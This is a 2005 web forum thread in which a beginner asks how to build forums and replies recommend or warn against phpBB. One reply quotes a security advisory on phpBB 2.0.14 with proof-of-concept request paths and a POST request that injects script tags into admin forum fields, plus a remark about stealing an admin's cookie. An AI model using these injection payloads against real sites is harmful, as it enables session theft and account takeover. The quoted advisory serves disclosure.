[deso]

Plz I need help to build forums step by step I am beginner and Thanks

This post has been edited by deso: 21 April 2005 - 08:42 AM

[Amadeus]

Are you usre you want to build forums from scratch? They can be fairly complex, and there are several open source versions available (phpBB is one).

If you do want to build one from scratch, did you have a format in mind? Features?

[skyhawk133]

I would suggest not building your own forums from scratch, instead you should try phpBB or some other free open source forum software.

[cyberscribe]

skyhawk133, on Apr 21 2005, 01:00 PM, said:

I would suggest not building your own forums from scratch, instead you should try phpBB or some other free open source forum software.

Not phpBB. More holes than swiss cheese these days.

[deso]

phpbb is a good way for beginners to build forums ?? I try it, alot of publications there and a slow server

[Amadeus]

Well, it's a lot easier than building them from scatch.

[cyberscribe]

Just came out today ... unless you're willing to deal with these kinds of security problems on a regular basis, I don't recommend phpBB.

Quote

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #14 - 17/04/05
--------------------------------------------------------
Program:  phpBB 2.0.14
Homepage:  http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.14 & Lower versions
Risk: Low Risk!!
Impact: Multiple Vulnerabilities.

      -==phpBB 2.0.14 Multiple Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

- Tested
---------------------------------------------------------
localhost & many forums

- Explotation
---------------------------------------------------------
          -==Bad Filter of HTML Code==-
phpBB2/profile.php?mode=viewprofile&u=\[]\
phpBB2/viewtopic.php?p=3&highlight=\[]\
#########################################################
                    -==XSS==-
POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create new forum

Some people cannot find it interest someones yes but well i dont care because if you put some effort you know that
you can do a lot with this, like fooling the Admin of the Hosting to get his cookie & and then get access to whm...

- References
--------------------------------------------------------
http://neosecurityte...Advisory-14.txt


- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>

[N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/

Got Questions? http://neosecurityteam.net/

Irc.gigachat.net #uruguay [NeoSecurity IRC]

- Greets
--------------------------------------------------------
          Paisterist
          Daemon21
          LINUX
      erg0t
          uyx
          CrashCool
          Makoki
          KingMetal
          r3v3ng4ns

          And my Colombian people

    @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
    '@@@@@''@@'@@@''''''''@@''@@@''@@
    '@@'@@@@@@''@@@@@@@@@'''''@@@
    '@@'''@@@@'''''''''@@@''''@@@
    @@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */



--
[phpsec] Mailing List
Brought to you by php|architect - http://www.phparch.com

For account maintenance, please visit http://www.phparch.com/phpsec